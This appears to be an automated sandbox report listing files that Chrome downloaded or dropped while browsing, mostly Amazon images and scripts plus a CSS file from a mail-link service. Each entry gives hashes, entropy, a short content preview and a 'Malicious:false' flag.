                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4015
                                                                                                                                                                                                                                                                Entropy (8bit):7.834404640170711
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:/8eHW9N2x0FpMzxywrPSxr9+Q88PPoc2oF9AEPD7ctB:/8yW9N2x0FpGrPo88PQHO9x2
                                                                                                                                                                                                                                                                MD5:4A6147E7D44A69AB341A3E445D5E252C
                                                                                                                                                                                                                                                                SHA1:6040E51DE5BF3E9BE1598037C14BA66908297520
                                                                                                                                                                                                                                                                SHA-256:6089A94879B75D348478D2A642D7A1354C3F4C685F514CFDA08D2DB621639599
                                                                                                                                                                                                                                                                SHA-512:57F117131AD5764FCFA5881604A00FB4334A70FF089B2E382187BBF10BE3B53F582C9CB31474498C567DC9106BF5EA5B504A0F962B293CEECEE69B9E3A3E2091
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................."......".$...$.6*&&*6>424>LDDL_Z_||.............................."......".$...$.6*&&*6>424>LDDL_Z_||.......t...."..........5...........................................................................zrX.?Ky......;.....K..J...s..t.}).....=..V{..M.VK.O....U.9\..}...m.87.Q.c .y..9{.6e...-...eR..t...9...~.....>.v.;M......T0...p'..n.ud...%)../..l........e......y...R{.A.~.K...\8_.o.....}..r8t..)vx.z.....ss.\.Z..]E..${V.<f..C.......=.8-C{...X........)*....3..T|........g..C....l..................2.............................!0.."1.%2A$@EFQUPRV............$.=L8....D....2O.......%...^v..w...v.jVE..U..B../F......@{....O..4.6.j.....V0.`B..q......|'.......v..5.....UC.$...<f..U..".$.id.O....lr.`...d....0..o.58..F..A...^~.`....].CZ..n...E.C...w.{(.{.n.......ug.e..PK...I..|....)b....@..ja....Q.aPl....5.R.7..8.ce.P.....2z9T.`..............\.F.E.e....yQ....7.l.5l......'...o..q.:^#r0.A66.]...._...j!C......~...X.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6950)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):285484
                                                                                                                                                                                                                                                                Entropy (8bit):5.497383097854063
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:rSxdJugNsSaR9jfmndXT3qVmAxkGxwFsDcOWQdAhZe9yzy6HoOU+/nr1TiYj7rq1:rSxdJugNsSyfmndXT3qVmAxkGxwFsDcc
                                                                                                                                                                                                                                                                MD5:16F4358ED56A5116BB81A54053A52C5B
                                                                                                                                                                                                                                                                SHA1:BBAE8032804CC7877CF1E9BDB395F5F72037B6FB
                                                                                                                                                                                                                                                                SHA-256:4683D79DC3B1AF33DBF7BA7A6DEE8F4177092795B07F7192DB90C428D1A0236B
                                                                                                                                                                                                                                                                SHA-512:0654733BC76E6E36FCEE74C29D413295F7B6C182CBDE76B839D083BBA1A9B21C06901CB6ED792FAA512F4A83ACD12122CD1E282379DDCC4CB7D727A65DD4BF74
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/814n7nvtI6L._RC%7C419fRIwP-FL.js_.js?AUIClients/InContextAuthBaseAssets
                                                                                                                                                                                                                                                                Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("FWCIMAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET FWCIMAssets - 4.0./////////////////////////.// BEGIN FILE src/js/fwcim.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):11343
                                                                                                                                                                                                                                                                Entropy (8bit):7.8408890300191585
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:V7c0ukzcG+Wci6djPbbZZ+5pEx44x0wNRd0qGpOO3fdpybSvjE:VXuk9BYjPBu+44x0wNWO014SvQ
                                                                                                                                                                                                                                                                MD5:653E5BD93BFFD1AD2EB2D3B582B39541
                                                                                                                                                                                                                                                                SHA1:9F98EFB095AF43E1DCB43D01B8405ACEB4C6822C
                                                                                                                                                                                                                                                                SHA-256:47D684825DE5F5975A143D6E76DCD59855A9B40EF619FFA395CC4E913085FCC3
                                                                                                                                                                                                                                                                SHA-512:872508ED71EF6C077A2752EE7FF925CB5BB7B55ECEA90AE36B486D01BBC874578096E35B72BEA42A39D2330D9A293FA909CE96B23DC1A979DFCA2FDDF3404BCC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/41A1Lpkr9HL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`................................................................................................3..jo......."K#H...$.4.Ith.]...F.%.Iti.Y.D.E..K...................%s.w..K...O........E.K.&.p.#..xF..C..o.$..oI...@.......,w..oK.....Q......*.\LP...........t.....=...g....?Z........w.O..q.............1.nt...z..................Wwikl._.c*_Y...x...^.\.....Q .......ik.$...I3.%.t............Fm#.t.............S.&.V.]}.9.z..|.Fv.t7.6..w.L..u5Si.[K....Z.j\..NV..B|..w.....^^............#&...>.x....p......^..Wx...f....o..sw...w.O^'....{..fw......\.....y...>.f,>...............Go..h.;..T`3..$...[....`......-(......u4.o.i.[6.k.6.I.}O`[g^....I...#d....`..........0...m..;X.......2_..S..j.x.c.<k.w.s....^.A.>..}............z==\...[3...@.|]
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 289x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):13529
                                                                                                                                                                                                                                                                Entropy (8bit):7.946508006845696
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:oRiBDDmG6hU67loocWSDH9bboeG2NVEGOSeQ2:qeDmG6Uk+WSDyeoieQ2
                                                                                                                                                                                                                                                                MD5:F1D9D5115C647167B54CE5B29B5CB7D1
                                                                                                                                                                                                                                                                SHA1:A11E4E590A16C79FB42F4EA82FD646746E4D0D34
                                                                                                                                                                                                                                                                SHA-256:DCDFDFFF3C58289B0725E40C836469B04C49B4A79EEBABC9E67764B3107641EA
                                                                                                                                                                                                                                                                SHA-512:B73A8EC713D4A1018FA49F24140E05F74DB59646A9C84D14CECA6DBBE9AAB710AC38CBFF1EEA9E5BFE0403B57E6261F8379AE608F081861ECBCEA2DD07AC612C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71zAUNa4XRL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........!.."..........4..................................................................w.vKy.g....&..<....3^.3@..........;.G...).0.Og..n%.*...t.s]...t&...k1.a...'.o..........9...Et.*7..Y#<....U.>~...\....c.e..U.M....].....p........4'=t>..G.y..M.DC...o..Z#p.=xkxw..v......5\....h.......>..\.............:.....)....#....,+..........D..].y......_bR.b......H.u...h....4....LgNj=.9.#|.t..,(..I.~.5.1ug,.F........L...VLt........>.#.k.>...Z.kW..B..6..AM-...k.S.7Go..0VzW..m..}....0e..W..........Yr.V.....V<,\..xD..\..\...e...d.Uvh.U...6..TX....^.5....Nn.h...'_D.Nc.H....d.f_mMz.x.jn&.6.E........z.....f...8.wl.O..].9.{W.6...vbIBY.......WZ.}w.~g...67.y5..O...>..|.....r&.;....cJ.Q..GtmJ=.$......]..:.@Z.....].,._g_.....u.L.........m.9.;..G.....e.J....bf.".OL.-J_..........t.T-.=.....~..}....F......
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1494
                                                                                                                                                                                                                                                                Entropy (8bit):7.491314812588649
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:TRe+0CmRoR1v2Do6fMDKPmQnrKi3Sa7HpRA4VhPUB676vlZWlx/pg4qu7+cSr+Ok:TT0rogo6fM+1rKiiiJ64VxUJvWjpg4nX
                                                                                                                                                                                                                                                                MD5:5A672574F8EB20918FFBCAC3548DCB2E
                                                                                                                                                                                                                                                                SHA1:0CE81554FD0520BF8966D31E3C358F7D964CA1E2
                                                                                                                                                                                                                                                                SHA-256:7ABC64236E3A1539675B3E2E300FF8C360E50313D8995C7B4432B86B53F740E6
                                                                                                                                                                                                                                                                SHA-512:5A4F1F94E77CAF0FD0D1580ACBE32C1692A1AC210F155BEADA502861475A0A6AAD0F75C8B1861AE338878939BCD9948ECA18B5B56342A16A802AE6BFE8F34B9A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!.1Q."2Aaq.....3r...#R...4................................................12............?..........................h...Qo.....1.h....s.w.........^kp.URuv.qMC<.M.q..X&...1]).K=...i2h..9;o)i[.[..U.b.....:.TUR.y@H........I..j.P..h.......w.IJO..8..Q.....r.87.Q.....Y6v...Fz./.Q.(..O.....\....D.......JR.n=.I...}...=6.75..#..Cj..,p.,vF.6..\..N.....:6...F.4..tw*u{.}$.t.YB..B.*t...X...._.M.....\-g.UN-oY.I...-.q.cN.oVpm.\.E..8..Ao}..c$.?......<..B....,h.,7...NO9......#......kR.;wXk..b.. ..If<...%@......^[m.....l.2......z.9[..q...S.6..f...ire.-];..Q......k...5.e..vH..e..L..._. .....2...V.(.P.5;J+.Y......QeuuV.j7..5.=.T..*m..8.x....ye....V..1N...9....\...$O+.k.N.8....:^....(..W..p....f..d..#%.SD..i8.3!y*\O.......T....GJ...u.n...I..l
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):13790
                                                                                                                                                                                                                                                                Entropy (8bit):7.924758207671438
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:5PK0j/hM9hevJuMBczrrQdJ1cyCxHundagiy0Hcb:5PK0z9vJDcz/QRcyjqyFb
                                                                                                                                                                                                                                                                MD5:3B15A57BC5BEEF25C19A78800A35DFA3
                                                                                                                                                                                                                                                                SHA1:0D1010DD4DB498F714FA95FF5B0F55CE97431E3B
                                                                                                                                                                                                                                                                SHA-256:E3EEAF0F462AF918DB2F5A43D4B95C73DC9F528D886F7628F6EBF312FD447383
                                                                                                                                                                                                                                                                SHA-512:7853F69530BDE143F3B9F0F919FCABAE52CFF9230E031DFF7858F477DF27147A7EFE56CDCC275268F0F9E569F7BBC8C09EF74D6F6A3A9F6E2CB75C802C68F59B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/81RRRcFjLJL._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........3................................................................,.......B.Y.c?.kW.4y.@c..Mk.R6.(UoJ..!c..i.{+e...nk........................?.g...]q.X...'H.3Xy.kb....\.5=Q.y0..)....9..S`......~p....rK2..~2..@@............<..G........yK..[e.7...1..^..i...&.-.....KyW2mQ.X..sQ........\y..m......Tj.q..w.i...5.O(.............xg...?\..s.._.]F..B..>.........v.....%.*B.$..hTt.b.Z..Eb.2T)9....v7.,....a..gd.-.].K....................fw=...k..e.,q<A...v........Q,"XK.4.j...T.....H/;\....[....^.pU.....&.,WS....7e...^`..........%X.../{.....iQ...c..&...X..].....\.Ab]r..I......p......u5].w\&.-e..DJ..Z.......k.............~.&..?.......r..vW.s.wx..Y...t..Y..}*a..h.r.k.^k..c.7k..^;J._6.~G$.k.yVM."..mm.N.oA...............U.~o...y...*V....SVl,...[s.....3.y...N.....lkc...}3.ok..Vx.|..fL..y.d;...#.-
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (65533), with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):89423
                                                                                                                                                                                                                                                                Entropy (8bit):5.054632846981616
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:invrjDVn5zUGaLV5f1x/hHCwxkn42k43SYim1gtd5xENM6HN26zdwbhB:invDaLJBhHCwc3SYiRENM6HN26BwbhB
                                                                                                                                                                                                                                                                MD5:5ED8A5EC7C2F3373DAB40F406BE4E1E6
                                                                                                                                                                                                                                                                SHA1:B28BAF01ED6D1017AACF302343E6C0C675D8127D
                                                                                                                                                                                                                                                                SHA-256:E3526F688F0037EB9818B78E5096B7ED43AEC8D0A9A1CBEA6C7FEA39D812291D
                                                                                                                                                                                                                                                                SHA-512:E6278C8F3961C16FBF963B4293C22FA504258112BFA3DF108B04BD5366E758515E268D5766493A684708854B6E02F0948D983C29E536FBC54E757D8649C4C27B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://url6.mailanyone.net/static/css/main.2768b4bf.chunk.css
                                                                                                                                                                                                                                                                Preview:.Toast_ToastContainer__3e1f-{position:fixed;z-index:2}.Toast_ToastContainer__3e1f- .Toast_Toast__1Ovpv{position:fixed;top:3.66rem;right:1rem;width:16.25rem;background-color:#ba2d0c;color:#fff;border-radius:0;border:0}.Toast_ToastContainer__3e1f- .Toast_ToastBody__JebBI{display:-webkit-flex;display:flex;padding:.625rem}.Toast_ToastContainer__3e1f- .Toast_Message__2sc2J{-webkit-flex:1 1;flex:1 1;font-size:.75rem;letter-spacing:-.011rem;text-align:left}.Toast_ToastContainer__3e1f- .Toast_CircleIcon__2DqTx{margin:.2rem .313rem}.Toast_ToastContainer__3e1f- .Toast_Close__2qAvD{display:-webkit-inline-flex;display:inline-flex;margin:.2rem .313rem;font-size:.74rem;padding:0;color:#fff;line-height:1rem;border:0}.Toast_ToastContainer__3e1f- .Toast_Close__2qAvD:hover{color:#fff;text-decoration:none}:root{--blue:#407198;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#ba2d0c;--orange:#fd7e14;--yellow:#dd9600;--green:#3bb273;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dar
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (310)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):311
                                                                                                                                                                                                                                                                Entropy (8bit):5.073537568777139
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Qs73kyM+BMLST+ELSWs6J9YM5UNb5IpDyXF0H1U:Z73keb6eaIpUUU
                                                                                                                                                                                                                                                                MD5:8FBCD7397015612749F5AEF3555E2DB0
                                                                                                                                                                                                                                                                SHA1:E35BEC608D098373D653726A48EA78172851FE89
                                                                                                                                                                                                                                                                SHA-256:F2F9E79D205218AE4E92C5D8BA5B6AA9564F2245BBA5630F45F79A2763EEB331
                                                                                                                                                                                                                                                                SHA-512:D051BA12F62C1BADFB8C746AD821DBEF06079D89B84667FC86A923055548D46243BD0C70454F3A27C4F104C439372BB569D4FEA5B772223172129A5EDDE413B1
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/01qO8RikT7L.js?xcp
                                                                                                                                                                                                                                                                Preview:'use strict';mix_d("ZeitgeistStaticFrontEndCards__p13n-zg-banner-landing-page-header:p13n-zg-banner-landing-page-header__bp9s6Sel",["exports","tslib"],function(a,b){a._operationNames=[];a.card=function(){return b.__awaiter(void 0,void 0,void 0,function(){return b.__generator(this,function(c){return[2]})})}});.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (607)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):10158
                                                                                                                                                                                                                                                                Entropy (8bit):5.1802871493858484
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:WiF4QtoZmosQwyi3aOxDxpL6shV/icawy8P+KexjLIvwEgveEHvuEfunuyUIK8AB:pto0oiPpL6shFiP8PX9I/PvV2yZ
                                                                                                                                                                                                                                                                MD5:07A45F05EF21AE19E99F4B71039C95CD
                                                                                                                                                                                                                                                                SHA1:D3B7399B84358638740DC746EE34FF8236B8E06C
                                                                                                                                                                                                                                                                SHA-256:DD16175D6A1472CEA68FC92923A98B80C7CBD809877CDFDD1091200FE3118C84
                                                                                                                                                                                                                                                                SHA-512:82FD00D8484B8365138B95D59413F916029B146059373013EFB5E9760FA5570D7F915A072D8F16563E6C81379DC0B7EA619D7C373CC4F77D1B8387D93282ED28
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(g){var e=window.AmazonUIPageJS||window.P,w=e._namespace||e.attributeErrors,p=w?w("AmazonGatewayHerotatorJS",""):e;p.guardFatal?p.guardFatal(g)(p,window):p.execute(function(){g(p,window)})})(function(g,e,w){g.when("generic-observable").register("gw-herotator-controller",function(g){var f=function(){};return function(e){function y(){h.notifyObservers("delayBegin")}function z(){h.notifyObservers("delayInterrupted")}function w(b){for(var c=0;c<l.length;c++)if(l[c]===b)return c+1}function k(a){a=.a||{};return{delay_complete:a.delay_complete||f,js_ready:a.js_ready||f,fg_loaded:a.fg_loaded||f,mouse_move:a.mouse_move||f,mouse_leave:a.mouse_leave||f,delay_interrupted_timeout:a.delay_interrupted_timeout||f,rotation_complete:a.rotation_complete||f,goto_card:function(a){a!==n&&b.user_navigation(l[a-1])},user_navigation:a.user_navigation||function(a){b=new D(a)},user_interaction:a.user_interaction||function(){b.user_navigation(l[n-1])},stop_autorotation:a.stop_autorotation||function(){b.u
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:MS Windows icon resource - 4 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):17542
                                                                                                                                                                                                                                                                Entropy (8bit):2.247918084411713
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:9dLhJ6/f2dh+xQLeZ10TLwhwOHae6nmErcglsIZS3F:3jaOdhQQu0TLwaOHEr6IZ
                                                                                                                                                                                                                                                                MD5:CA6619B86C2F6E6068B69BA3AADDB7E4
                                                                                                                                                                                                                                                                SHA1:C44A1BB9D14385334EB851FBB0AFB19D961C1EE7
                                                                                                                                                                                                                                                                SHA-256:17D02E2DB6DBEDB95DD449D06868C147AC2C3B5371497BCB9407E75336A99E09
                                                                                                                                                                                                                                                                SHA-512:30F8F8618BFBCD57925411E6860A10B6AD9A60F2A6B08D35C870EA3F4CEC4692596A937FF1457CEFF5847D5DA2B86CEBA0200706625E28C56A2455E6A8C121D3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/favicon.ico
                                                                                                                                                                                                                                                                Preview:......00.... ..%..F... .... ......%........ ......6........ .h....@..(...0...`..... ......%.........................................E...................................................................................................................................................?...................................$...........................................................................................................................................................................................B............................................................................r...P..........................................................................................9...............-........................................................r...................................................>......................................................................$..............................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):23
                                                                                                                                                                                                                                                                Entropy (8bit):4.175735869100492
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:VXciJ:hD
                                                                                                                                                                                                                                                                MD5:C7D3355DDAC8D35912F6CB56C4BE6ECA
                                                                                                                                                                                                                                                                SHA1:4ECB85CA8A4B633FE7DB11B2B7591AF83A89D406
                                                                                                                                                                                                                                                                SHA-256:88EA58255D4CD82340F7ACAABE0E6A99F195A4DC2CA6EF56EC503D03B331BEE5
                                                                                                                                                                                                                                                                SHA-512:8164D943F11F6559A8AB31869676FD4801E6E8C18DF05B53EF2F5CE5EC23BD632E66018EC134DA658289B6FA4C2BA15EF47DCF6210866457CFA7DEDB45994272
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/G/01/csm/showads.v2.js?category=ad&adstype=-ad-column-&ad_size=-housead-
                                                                                                                                                                                                                                                                Preview:window.ue_adb_chk = 1;.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6950)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):263241
                                                                                                                                                                                                                                                                Entropy (8bit):5.402576149145902
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:6wJFp+KkP0R9NLRqZSHoFvKZOyxXqv9KPXobdP2JwV5hI8MV4+4BZ2fTzdh1CXtj:6wJFp+KkP+LRqZSHoFvKZhxXqv9KPXo9
                                                                                                                                                                                                                                                                MD5:BCEEC262E334DD84CFAEF57B305CCD6E
                                                                                                                                                                                                                                                                SHA1:3A914AAC06ED5A0C95B1BF0A138EEC95795C64EC
                                                                                                                                                                                                                                                                SHA-256:5CC6D8DE96138950861AF49D02E785F0F98F35C06E9166F6387C939FC1D0F7C3
                                                                                                                                                                                                                                                                SHA-512:C2C5D2C070EEB8BA6572FCE266CAA194D0E6A4D52DB1C719E50F160AEA80A704D21062F8D142A4816F34518A49D8980B91296E3C337FFBDB778070C9D114BFA0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("FWCIMAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET FWCIMAssets - 4.0./////////////////////////.// BEGIN FILE src/js/fwcim.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 129x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):8125
                                                                                                                                                                                                                                                                Entropy (8bit):7.939343522855013
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:A06MN4rnkbvsmTMw5i5JEYiL4KzaqgU7EMFgri3w5:A064474vspw5iQ43taoKK
                                                                                                                                                                                                                                                                MD5:A244B905C73D4C7559BE68145671E4CD
                                                                                                                                                                                                                                                                SHA1:45A4E1331D6A75FA4203EDD9CDDCFC54F524FC58
                                                                                                                                                                                                                                                                SHA-256:C29DE5570ECDFCE83C201B5DEFCA919655BBBF0A230CDF8CDE513975F6F3F116
                                                                                                                                                                                                                                                                SHA-512:98D1C25ECB1DDE7E43ECB05956040ABA9D0703A599E3321BB31A062EEB9D0B1B2D92E37931007799A4B68C48C2F106110EDE842B3F265F3378B4EA755B4CEB1A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.."1A.2Q.#5RTat.....Bq.3br...&6................................................1.!Q..A#.............?....m..o.J8]....3...N9'M....`.....t..v................?.>`...j..-Z..O...h=5j..?.'..S.;.J_.................:.f.....a.E....x....`........}......a.G.`w.6.....;....y9.:.....'...I......3..|+=5k..?.'...........".H.D.~p6.d.n..8_....[a...J....#..O<rF.?..q...MZ..O...h=5j..?.'..$a..m...6w..2..A..D.u.R(.A.....aX8.|..u...2I'C...=5k..?.'..j.....O.]r.C+w$..0.......8..r=.}=.1.w.t8..]...A.9.:.g...W.)..!?m....`......).......+.`.n...9....Z..0d..-......y.@8..>9.MZ..O...h.Z.}.......H..6......8.....R.}5.48.y."...J~.5.FxC......X?@.&.......9..g.....|=}EcZ..{q...S..`K..........]-.;t..M..L........RL.x.....S.......i|W...T.....&RH|.....|pu..4..#O..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3872
                                                                                                                                                                                                                                                                Entropy (8bit):4.401635005544287
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:AMHaubkbWBp30kbtxwOjWzHdEjMvUcbuV6qxvaRb:vtvBd04Wz92qDuV6evaRb
                                                                                                                                                                                                                                                                MD5:AA37F93E3E73F2178BF82DEB44F4FE8F
                                                                                                                                                                                                                                                                SHA1:D111A59E726422D396E700E2232268350F5AE50C
                                                                                                                                                                                                                                                                SHA-256:B9CBDABD491B252B7D79A933B276174FE1083363CB5F4EF5729CE18159B6520C
                                                                                                                                                                                                                                                                SHA-512:F10EE525362065DA52116EB74A4C9B7FCE631379BC83B82B6A98358C41C00A48AC99C1F0917078ADAF49EE0D5BFAA5CC7C579B152ACD7FEE6B5053EF1A591915
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://d2h8zr0m6mus4x.cloudfront.net/primesignup/package.json?_=1723469083336
